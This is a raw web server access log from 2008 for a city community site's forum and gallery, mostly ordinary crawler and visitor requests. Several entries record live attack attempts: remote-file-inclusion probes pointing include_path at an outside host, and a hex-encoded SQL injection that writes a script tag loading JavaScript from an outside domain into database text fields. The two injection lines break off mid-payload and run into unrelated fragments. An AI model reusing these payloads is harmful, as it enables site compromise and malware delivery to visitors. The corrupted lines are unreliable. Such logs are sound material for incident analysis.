74.6.18.251 - - [28/Aug/2008:06:19:59 -0700] "GET /forum2/index.php?s=b33b3d422be616d6e7bd9e19bed80582&showtopic=6&st=20&p=787& HTTP/1.0" 200 11834 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.sancarloscity.org"
208.115.111.242 - - [28/Aug/2008:06:20:13 -0700] "GET /forum2/index.php?s=49eaba20b30c0e5596daa0322c83e823&act=Reg&CODE=00 HTTP/1.1" 200 3104 "-" "DotBot/1.0.1 (http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.sancarloscity.org"
218.186.9.4 - - [28/Aug/2008:06:20:14 -0700] "GET /forum2/index.php?s=9b334fe97eca4a239a6f98ce1c7065e8&automodule=blog&blogid=3&&st=10 HTTP/1.1" 200 16443 "http://www.sancarloscity.org/forum2/index.php?automodule=blog&blogid=3&" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "www.sancarloscity.org"
218.186.9.4 - - [28/Aug/2008:06:20:15 -0700] "GET /forum2/index.php?act=task HTTP/1.1" 200 59 "http://www.sancarloscity.org/forum2/index.php?s=9b334fe97eca4a239a6f98ce1c7065e8&automodule=blog&blogid=3&&st=10" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "www.sancarloscity.org"
208.115.111.242 - - [28/Aug/2008:06:20:30 -0700] "GET /forum2/index.php?s=49eaba20b30c0e5596daa0322c83e823&act=Search HTTP/1.1" 200 3013 "-" "DotBot/1.0.1 (http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.sancarloscity.org"
200.63.42.95 - - [28/Aug/2008:06:20:33 -0700] "GET /jodera2/index.php HTTP/1.0" 200 61474 "http://www.sancarloscity.org/jodera2/index.php" "Mozilla/5.0 (Windows NT 5.1; U; en) Opera 8.01" "www.sancarloscity.org"
208.115.111.242 - - [28/Aug/2008:06:20:39 -0700] "GET /forum2/index.php?s=49eaba20b30c0e5596daa0322c83e823&act=Search&f=0 HTTP/1.1" 200 3018 "-" "DotBot/1.0.1 (http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.sancarloscity.org"
200.63.42.95 - - [28/Aug/2008:06:20:44 -0700] "GET /jodera2/viewforum.php?f=1&sid=98733290ff64a5e9bdaac6731d722c72 HTTP/1.0" 200 83672 "http://www.sancarloscity.org/viewforum.php?f=1&sid=98733290ff64a5e9bdaac6731d722c72" "Mozilla/5.0 (Windows NT 5.1; U; en) Opera 8.01" "www.sancarloscity.org"
208.115.111.242 - - [28/Aug/2008:06:20:46 -0700] "GET /forum2/index.php?s=49eaba20b30c0e5596daa0322c83e823&act=Stats HTTP/1.1" 200 2471 "-" "DotBot/1.0.1 (http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.sancarloscity.org"
200.63.42.95 - - [28/Aug/2008:06:20:51 -0700] "GET /jodera2/login.php HTTP/1.0" 200 12333 "http://www.sancarloscity.org/login.php" "Mozilla/5.0 (Windows NT 5.1; U; en) Opera 8.01" "www.sancarloscity.org"
200.63.42.95 - - [28/Aug/2008:06:20:53 -0700] "POST /jodera2/login.php HTTP/1.0" 302 0 "http://www.sancarloscity.org/jodera2/login.php" "Mozilla/5.0 (Windows NT 5.1; U; en) Opera 8.01" "www.sancarloscity.org"
200.63.42.95 - - [28/Aug/2008:06:20:53 -0700] "GET /jodera2/index.php?sid=98733290ff64a5e9bdaac6731d722c72 HTTP/1.0" 200 54935 "http://www.sancarloscity.org/jodera2/index.php?sid=98733290ff64a5e9bdaac6731d722c72" "Mozilla/5.0 (Windows NT 5.1; U; en) Opera 8.01" "www.sancarloscity.org"
208.115.111.242 - - [28/Aug/2008:06:20:54 -0700] "GET /forum2/index.php?s=49eaba20b30c0e5596daa0322c83e823&act=Stats&CODE=leaders HTTP/1.1" 200 2681 "-" "DotBot/1.0.1 (http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.sancarloscity.org"
200.63.42.95 - - [28/Aug/2008:06:20:57 -0700] "GET /jodera2/viewforum.php?f=1 HTTP/1.0" 200 83718 "http://www.sancarloscity.org/viewforum.php?f=1" "Mozilla/5.0 (Windows NT 5.1; U; en) Opera 8.01" "www.sancarloscity.org"
200.63.42.95 - - [28/Aug/2008:06:20:59 -0700] "GET /jodera2/posting.php?mode=newtopic&f=1 HTTP/1.0" 200 41358 "http://www.sancarloscity.org/posting.php?mode=newtopic&f=1" "Mozilla/5.0 (Windows NT 5.1; U; en) Opera 8.01" "www.sancarloscity.org"
208.115.111.242 - - [28/Aug/2008:06:21:01 -0700] "GET /forum2/index.php?s=49eaba20b30c0e5596daa0322c83e823&act=calendar HTTP/1.1" 200 4060 "-" "DotBot/1.0.1 (http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.sancarloscity.org"
200.63.42.95 - - [28/Aug/2008:06:21:07 -0700] "POST /jodera2/posting.php HTTP/1.0" 200 11432 "http://www.sancarloscity.org/jodera2/posting.php?mode=newtopic&f=1" "Mozilla/5.0 (Windows NT 5.1; U; en) Opera 8.01" "www.sancarloscity.org"
208.115.111.242 - - [28/Aug/2008:06:21:10 -0700] "GET /forum2/index.php?s=49eaba20b30c0e5596daa0322c83e823&act=home HTTP/1.1" 200 3444 "-" "DotBot/1.0.1 (http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.sancarloscity.org"
208.115.111.242 - - [28/Aug/2008:06:21:19 -0700] "GET /forum2/index.php?s=49eaba20b30c0e5596daa0322c83e823&act=idx HTTP/1.1" 200 5452 "-" "DotBot/1.0.1 (http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.sancarloscity.org"
217.133.215.166 - - [28/Aug/2008:06:21:23 -0700] "GET /logs/access_080806.log//guestbook1//admin.php?include_path=http://www.alevichat.com/idN.txt?? HTTP/1.1" 404 781 "-" "libwww-perl/5.805" "www.sancarloscity.org"
217.133.215.166 - - [28/Aug/2008:06:21:23 -0700] "GET /logs//guestbook1//admin.php?include_path=http://www.alevichat.com/idN.txt?? HTTP/1.1" 404 763 "-" "libwww-perl/5.805" "www.sancarloscity.org"
208.115.111.242 - - [28/Aug/2008:06:21:27 -0700] "GET /forum2/index.php?s=49eaba20b30c0e5596daa0322c83e823&act=module&module=gallery HTTP/1.1" 200 4913 "-" "DotBot/1.0.1 (http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.sancarloscity.org"
208.115.111.242 - - [28/Aug/2008:06:21:34 -0700] "GET /forum2/index.php?s=49eaba20b30c0e5596daa0322c83e823&act=search&CODE=getactive HTTP/1.1" 302 5 "-" "DotBot/1.0.1 (http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.sancarloscity.org"
74.6.18.251 - - [28/Aug/2008:06:22:00 -0700] "GET /forum2/index.php?act=Post&CODE=02&f=10&t=63&qpid=1290 HTTP/1.0" 200 2905 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.sancarloscity.org"
193.138.94.10 - - [28/Aug/2008:06:22:04 -0700] "GET /sampo/flv/073008/5.flv HTTP/1.0" 200 8969286 "http://sancarloscity.org/sampo/Multichannel.swf" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.0.3705)" "www.sancarloscity.org"
218.186.9.4 - - [28/Aug/2008:06:22:11 -0700] "GET /forum2/index.php?automodule=blog&blogid=3&&st=20 HTTP/1.1" 200 13941 "http://www.sancarloscity.org/forum2/index.php?s=9b334fe97eca4a239a6f98ce1c7065e8&automodule=blog&blogid=3&&st=10" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "www.sancarloscity.org"
218.186.9.4 - - [28/Aug/2008:06:22:12 -0700] "GET /forum2/index.php?act=task HTTP/1.1" 200 59 "http://www.sancarloscity.org/forum2/index.php?automodule=blog&blogid=3&&st=20" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "www.sancarloscity.org"
218.186.9.4 - - [28/Aug/2008:06:22:19 -0700] "GET /forum2/index.php?act=module&module=gallery HTTP/1.1" 200 5290 "http://www.sancarloscity.org/forum2/index.php?automodule=blog&blogid=3&&st=20" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "www.sancarloscity.org"
218.186.9.4 - - [28/Aug/2008:06:22:19 -0700] "GET /forum2/favicon.ico HTTP/1.1" 200 1406 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "www.sancarloscity.org"
218.186.9.4 - - [28/Aug/2008:06:22:19 -0700] "GET /forum2/style_images/2_2_sccilogobluebkgrd.gif HTTP/1.1" 200 8834 "http://www.sancarloscity.org/forum2/index.php?act=module&module=gallery" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "www.sancarloscity.org"
218.186.9.4 - - [28/Aug/2008:06:22:19 -0700] "GET /forum2/jscripts/ipb_galleryjs.js HTTP/1.1" 200 7039 "http://www.sancarloscity.org/forum2/index.php?act=module&module=gallery" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "www.sancarloscity.org"
218.186.9.4 - - [28/Aug/2008:06:22:20 -0700] "GET /forum2/style_images/red_crysta/nav_m.gif HTTP/1.1" 200 53 "http://www.sancarloscity.org/forum2/index.php?act=module&module=gallery" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "www.sancarloscity.org"
218.186.9.4 - - [28/Aug/2008:06:22:20 -0700] "GET /forum2/uploads/1182562075/tn_gallery_24_22_852805.jpg HTTP/1.1" 200 1860 "http://www.sancarloscity.org/forum2/index.php?act=module&module=gallery" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "www.sancarloscity.org"
218.186.9.4 - - [28/Aug/2008:06:22:20 -0700] "GET /forum2/style_images/red_crysta/bf_nonew.gif HTTP/1.1" 200 919 "http://www.sancarloscity.org/forum2/index.php?act=module&module=gallery" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "www.sancarloscity.org"
218.186.9.4 - - [28/Aug/2008:06:22:20 -0700] "GET /forum2/style_images/red_crysta/user.gif HTTP/1.1" 200 790 "http://www.sancarloscity.org/forum2/index.php?act=module&module=gallery" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "www.sancarloscity.org"
218.186.9.4 - - [28/Aug/2008:06:22:20 -0700] "GET /forum2/style_images/red_crysta/stats.gif HTTP/1.1" 200 478 "http://www.sancarloscity.org/forum2/index.php?act=module&module=gallery" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "www.sancarloscity.org"
218.186.9.4 - - [28/Aug/2008:06:22:20 -0700] "GET /forum2/uploads/1182562075/tn_gallery_24_22_248064.jpg HTTP/1.1" 200 4179 "http://www.sancarloscity.org/forum2/index.php?act=module&module=gallery" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "www.sancarloscity.org"
218.186.9.4 - - [28/Aug/2008:06:22:21 -0700] "GET /forum2/uploads/1182562075/tn_gallery_279_28_4958.jpg HTTP/1.1" 200 3074 "http://www.sancarloscity.org/forum2/index.php?act=module&module=gallery" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "www.sancarloscity.org"
218.186.9.4 - - [28/Aug/2008:06:22:21 -0700] "GET /forum2/uploads/1182562075/tn_gallery_279_28_55992.jpg HTTP/1.1" 200 3500 "http://www.sancarloscity.org/forum2/index.php?act=module&module=gallery" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "www.sancarloscity.org"
218.186.9.4 - - [28/Aug/2008:06:22:21 -0700] "GET /forum2/uploads/1182562075/tn_gallery_279_28_13216.jpg HTTP/1.1" 200 3886 "http://www.sancarloscity.org/forum2/index.php?act=module&module=gallery" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "www.sancarloscity.org"
218.186.9.4 - - [28/Aug/2008:06:22:21 -0700] "GET /forum2/uploads/1182562075/tn_gallery_279_28_10291.jpg HTTP/1.1" 200 3133 "http://www.sancarloscity.org/forum2/index.php?act=module&module=gallery" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "www.sancarloscity.org"
218.186.9.4 - - [28/Aug/2008:06:22:21 -0700] "GET /forum2/uploads/1182562075/tn_gallery_279_28_13638.jpg HTTP/1.1" 200 4307 "http://www.sancarloscity.org/forum2/index.php?act=module&module=gallery" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "www.sancarloscity.org"
218.186.9.4 - - [28/Aug/2008:06:22:21 -0700] "GET /forum2/uploads/1182562075/tn_gallery_279_28_26222.jpg HTTP/1.1" 200 3958 "http://www.sancarloscity.org/forum2/index.php?act=module&module=gallery" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "www.sancarloscity.org"
218.186.9.4 - - [28/Aug/2008:06:22:21 -0700] "GET /forum2/uploads/1182562075/tn_gallery_279_28_200950.jpg HTTP/1.1" 200 3273 "http://www.sancarloscity.org/forum2/index.php?act=module&module=gallery" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "www.sancarloscity.org"
218.186.9.4 - - [28/Aug/2008:06:22:21 -0700] "GET /forum2/uploads/1182562075/tn_gallery_279_28_23890.jpg HTTP/1.1" 200 3547 "http://www.sancarloscity.org/forum2/index.php?act=module&module=gallery" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "www.sancarloscity.org"
218.186.9.4 - - [28/Aug/2008:06:22:21 -0700] "GET /forum2/index.php?act=task HTTP/1.1" 200 59 "http://www.sancarloscity.org/forum2/index.php?act=module&module=gallery" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "www.sancarloscity.org"
218.186.9.4 - - [28/Aug/2008:06:22:21 -0700] "GET /forum2/style_images/red_crysta/rss.png HTTP/1.1" 200 1090 "http://www.sancarloscity.org/forum2/index.php?act=module&module=gallery" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "www.sancarloscity.org"
218.186.9.4 - - [28/Aug/2008:06:22:21 -0700] "GET /forum2/style_images/red_crysta/img_larger.gif HTTP/1.1" 200 54 "http://www.sancarloscity.org/forum2/style_images/css_2.css" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "www.sancarloscity.org"
218.186.9.4 - - [28/Aug/2008:06:22:29 -0700] "GET /forum2/index.php?automodule=gallery&req=si&img=266 HTTP/1.1" 200 5065 "http://www.sancarloscity.org/forum2/index.php?act=module&module=gallery" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "www.sancarloscity.org"
218.186.9.4 - - [28/Aug/2008:06:22:30 -0700] "GET /forum2/style_images/red_crysta/folder_editor_images/css_rte.css HTTP/1.1" 200 4313 "http://www.sancarloscity.org/forum2/index.php?automodule=gallery&req=si&img=266" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "www.sancarloscity.org"
218.186.9.4 - - [28/Aug/2008:06:22:30 -0700] "GET /forum2/uploads/1182562075/med_gallery_24_22_852805.jpg HTTP/1.1" 200 22895 "http://www.sancarloscity.org/forum2/index.php?automodule=gallery&req=si&img=266" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "www.sancarloscity.org"
218.186.9.4 - - [28/Aug/2008:06:22:30 -0700] "GET /forum2/style_images/red_crysta/exp_plus.gif HTTP/1.1" 200 61 "http://www.sancarloscity.org/forum2/index.php?automodule=gallery&req=si&img=266" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "www.sancarloscity.org"
218.186.9.4 - - [28/Aug/2008:06:22:30 -0700] "GET /forum2/style_images/red_crysta/exp_minus.gif HTTP/1.1" 200 59 "http://www.sancarloscity.org/forum2/index.php?automodule=gallery&req=si&img=266" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "www.sancarloscity.org"
218.186.9.4 - - [28/Aug/2008:06:22:30 -0700] "GET /forum2/style_images/red_crysta/rigt_image.gif HTTP/1.1" 200 87 "http://www.sancarloscity.org/forum2/index.php?automodule=gallery&req=si&img=266" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "www.sancarloscity.org"
218.186.9.4 - - [28/Aug/2008:06:22:30 -0700] "GET /forum2/jscripts/ips_text_editor_lite.js HTTP/1.1" 200 9928 "http://www.sancarloscity.org/forum2/index.php?automodule=gallery&req=si&img=266" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "www.sancarloscity.org"
218.186.9.4 - - [28/Aug/2008:06:22:30 -0700] "GET /forum2/uploads/1182562075/tn_gallery_24_22_44775.jpg HTTP/1.1" 200 4819 "http://www.sancarloscity.org/forum2/index.php?automodule=gallery&req=si&img=266" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "www.sancarloscity.org"
218.186.9.4 - - [28/Aug/2008:06:22:31 -0700] "GET /forum2/index.php?act=task HTTP/1.1" 200 59 "http://www.sancarloscity.org/forum2/index.php?automodule=gallery&req=si&img=266" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "www.sancarloscity.org"
218.186.9.4 - - [28/Aug/2008:06:22:32 -0700] "GET /forum2/style_images/red_crysta/img-resized.png HTTP/1.1" 200 677 "http://www.sancarloscity.org/forum2/index.php?automodule=gallery&req=si&img=266" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "www.sancarloscity.org"
67.234.101.93 - - [28/Aug/2008:06:22:40 -0700] "GET /logs/access_080706.log?;DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D27272B5B272B40432B275D207768emtgibson/us4:118.172.2367.234.101.93 - - [28/Aug/2008:06:22:49 -0700] "GET /logs/access_080706.log?';DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D27272B5B272B40432B275D20776readfairytales/us1:192.2218.186.9.4 - - [28/Aug/2008:06:22:49 -0700] "GET /forum2/index.php?automodule=gallery&req=si&img=247 HTTP/1.1" 200 4735 "http://www.sancarloscity.org/forum2/index.php?act=module&module=gallery" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "www.sancarloscity.org"
218.186.9.4 - - [28/Aug/2008:06:22:50 -0700] "GET /forum2/uploads/1182562075/med_gallery_279_28_55992.jpg HTTP/1.1" 200 34545 "http://www.sancarloscity.org/forum2/index.php?automodule=gallery&req=si&img=247" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "www.sancarloscity.org"
218.186.9.4 - - [28/Aug/2008:06:22:50 -0700] "GET /forum2/index.php?act=task HTTP/1.1" 200 59 "http://www.sancarloscity.org/forum2/index.php?automodule=gallery&req=si&img=247" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "www.sancarloscity.org"
218.186.9.4 - - [28/Aug/2008:06:23:00 -0700] "GET /forum2/index.php?automodule=gallery&req=si&img=226 HTTP/1.1" 200 4790 "http://www.sancarloscity.org/forum2/index.php?act=module&module=gallery" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "www.sancarloscity.org"
218.186.9.4 - - [28/Aug/2008:06:23:01 -0700] "GET /forum2/uploads/1182562075/med_gallery_279_28_23890.jpg HTTP/1.1" 200 41308 "http://www.sancarloscity.org/forum2/index.php?automodule=gallery&req=si&img=226" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "www.sancarloscity.org"
218.186.9.4 - - [28/Aug/2008:06:23:01 -0700] "GET /forum2/style_images/red_crysta/left_image.gif HTTP/1.1" 200 846 "http://www.sancarloscity.org/forum2/index.php?automodule=gallery&req=si&img=226" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "www.sancarloscity.org"
218.186.9.4 - - [28/Aug/2008:06:23:01 -0700] "GET /forum2/uploads/1182562075/tn_gallery_279_28_27148.jpg HTTP/1.1" 200 4090 "http://www.sancarloscity.org/forum2/index.php?automodule=gallery&req=si&img=226" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "www.sancarloscity.org"
218.186.9.4 - - [28/Aug/2008:06:23:01 -0700] "GET /forum2/uploads/1182562075/tn_gallery_279_28_30212.jpg HTTP/1.1" 200 4358 "http://www.sancarloscity.org/forum2/index.php?automodule=gallery&req=si&img=226" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "www.sancarloscity.org"
218.186.9.4 - - [28/Aug/2008:06:23:01 -0700] "GET /forum2/uploads/1182562075/tn_gallery_279_28_23813.jpg HTTP/1.1" 200 4412 "http://www.sancarloscity.org/forum2/index.php?automodule=gallery&req=si&img=226" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "www.sancarloscity.org"
218.186.9.4 - - [28/Aug/2008:06:23:01 -0700] "GET /forum2/uploads/1182562075/tn_gallery_279_28_36505.jpg HTTP/1.1" 200 3637 "http://www.sancarloscity.org/forum2/index.php?automodule=gallery&req=si&img=226" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "www.sancarloscity.org"
218.186.9.4 - - [28/Aug/2008:06:23:01 -0700] "GET /forum2/index.php?act=task HTTP/1.1" 200 59 "http://www.sancarloscity.org/forum2/index.php?automodule=gallery&req=si&img=226" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "www.sancarloscity.org"
218.186.9.4 - - [28/Aug/2008:06:23:07 -0700] "GET /forum2/index.php?automodule=gallery&req=si&img=228 HTTP/1.1" 200 4793 "http://www.sancarloscity.org/forum2/index.php?automodule=gallery&req=si&img=226" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "www.sancarloscity.org"
218.186.9.4 - - [28/Aug/2008:06:23:08 -0700] "GET /forum2/uploads/1182562075/med_gallery_279_28_27148.jpg HTTP/1.1" 200 42338 "http://www.sancarloscity.org/forum2/index.php?automodule=gallery&req=si&img=228" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "www.sancarloscity.org"
218.186.9.4 - - [28/Aug/2008:06:23:08 -0700] "GET /forum2/uploads/1182562075/tn_gallery_279_28_66686.jpg HTTP/1.1" 200 4248 "http://www.sancarloscity.org/forum2/index.php?automodule=gallery&req=si&img=228" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "www.sancarloscity.org"
218.186.9.4 - - [28/Aug/2008:06:23:08 -0700] "GET /forum2/uploads/1182562075/tn_gallery_279_28_56021.jpg HTTP/1.1" 200 3982 "http://www.sancarloscity.org/forum2/index.php?automodule=gallery&req=si&img=228" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "www.sancarloscity.org"
218.186.9.4 - - [28/Aug/2008:06:23:08 -0700] "GET /forum2/index.php?act=task HTTP/1.1" 200 59 "http://www.sancarloscity.org/forum2/index.php?automodule=gallery&req=si&img=228" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "www.sancarloscity.org"
208.111.154.15 - - [28/Aug/2008:06:23:13 -0700] "GET /robots.txt HTTP/1.0" 200 44 "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" "www.sancarloscity.org"
208.111.154.25 - - [28/Aug/2008:06:23:17 -0700] "GET /picgallery/displayimage.php?album=random&cat=0&pos=-481 HTTP/1.1" 200 13768 "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" "www.sancarloscity.org"
218.186.9.4 - - [28/Aug/2008:06:23:20 -0700] "GET /forum2/index.php?automodule=gallery&req=si&img=229 HTTP/1.1" 200 4795 "http://www.sancarloscity.org/forum2/index.php?automodule=gallery&req=si&img=228" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "www.sancarloscity.org"
218.186.9.4 - - [28/Aug/2008:06:23:21 -0700] "GET /forum2/uploads/1182562075/med_gallery_279_28_66686.jpg HTTP/1.1" 200 47380 "http://www.sancarloscity.org/forum2/index.php?automodule=gallery&req=si&img=229" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "www.sancarloscity.org"
218.186.9.4 - - [28/Aug/2008:06:23:21 -0700] "GET /forum2/uploads/1182562075/tn_gallery_279_28_47618.jpg HTTP/1.1" 200 4772 "http://www.sancarloscity.org/forum2/index.php?automodule=gallery&req=si&img=229" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "www.sancarloscity.org"
218.186.9.4 - - [28/Aug/2008:06:23:21 -0700] "GET /forum2/index.php?act=task HTTP/1.1" 200 59 "http://www.sancarloscity.org/forum2/index.php?automodule=gallery&req=si&img=229" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "www.sancarloscity.org"
218.186.9.4 - - [28/Aug/2008:06:23:31 -0700] "GET /forum2/index.php?automodule=gallery&req=si&img=224 HTTP/1.1" 200 4788 "http://www.sancarloscity.org/forum2/index.php?automodule=gallery&req=si&img=226" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "www.sancarloscity.org"
